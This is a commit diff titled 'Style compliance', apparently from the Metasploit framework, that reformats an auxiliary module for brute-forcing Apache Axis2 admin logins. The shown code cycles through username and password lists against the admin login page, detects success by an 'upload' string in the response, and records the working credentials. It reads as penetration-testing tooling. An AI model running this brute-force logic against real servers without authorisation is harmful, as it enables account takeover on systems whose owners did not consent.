Style compliance
parent
3ac2182984
commit
05e24326a6
|
@ -17,10 +17,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Apache Axis2 v1.4.1 Brute Force Utility',
|
'Name' => 'Apache Axis2 Brute Force Utility',
|
||||||
'Description' => %q{This module attempts to login to an Apache Axis2 v1.4.1
|
'Description' => %q{
|
||||||
instance using username and password combindations indicated by the USER_FILE,
|
This module attempts to login to an Apache Axis2 instance using
|
||||||
PASS_FILE, and USERPASS_FILE options.
|
username and password combindations indicated by the USER_FILE,
|
||||||
|
PASS_FILE, and USERPASS_FILE options. It has been verified to
|
||||||
|
work on at least versions 1.4.1 and 1.6.2.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -35,9 +37,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
)
|
||||||
|
|
||||||
register_options(
|
register_options( [
|
||||||
[ Opt::RPORT(8080),
|
Opt::RPORT(8080),
|
||||||
OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),
|
OptString.new('URI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -49,10 +51,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
print_status("Verifying login exists at #{target_url}")
|
print_status("Verifying login exists at #{target_url}")
|
||||||
begin
|
begin
|
||||||
res = send_request_cgi({
|
send_request_cgi({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => datastore['URI']
|
'uri' => datastore['URI']
|
||||||
}, 20)
|
}, 20)
|
||||||
rescue
|
rescue
|
||||||
print_error("The Axis2 login page does not exist at #{target_url}")
|
print_error("The Axis2 login page does not exist at #{target_url}")
|
||||||
return
|
return
|
||||||
|
@ -77,12 +79,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'data' => post_data,
|
'data' => post_data,
|
||||||
}, 20)
|
}, 20)
|
||||||
|
|
||||||
if (res and res.code == 200 and res.body.to_s.match(/upload/) != nil)
|
if res && res.code == 200 && res.body.to_s.match(/upload/) != nil
|
||||||
print_good("#{target_url} - Apache Axis - SUCCESSFUL login for '#{user}' : '#{pass}'")
|
print_good("#{target_url} - Apache Axis - SUCCESSFUL login for '#{user}' : '#{pass}'")
|
||||||
report_auth_info(
|
report_auth_info(
|
||||||
:host => rhost,
|
:host => rhost,
|
||||||
:port => rport,
|
:port => rport,
|
||||||
:sname => (ssl ? 'https' : 'http'),
|
:sname => (ssl ? 'https' : 'http'),
|
||||||
:user => user,
|
:user => user,
|
||||||
:pass => pass,
|
:pass => pass,
|
||||||
:proof => "WEBAPP=\"Apache Axis\", VHOST=#{vhost}",
|
:proof => "WEBAPP=\"Apache Axis\", VHOST=#{vhost}",
|
||||||
|
@ -91,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:active => true
|
:active => true
|
||||||
)
|
)
|
||||||
|
|
||||||
elsif(res and res.code == 200)
|
elsif res && res.code == 200
|
||||||
vprint_error("#{target_url} - Apache Axis - Failed to login as '#{user}'")
|
vprint_error("#{target_url} - Apache Axis - Failed to login as '#{user}'")
|
||||||
else
|
else
|
||||||
vprint_error("#{target_url} - Apache Axis - Unable to authenticate.")
|
vprint_error("#{target_url} - Apache Axis - Unable to authenticate.")
|
||||||
|
|
Loading…
Reference in New Issue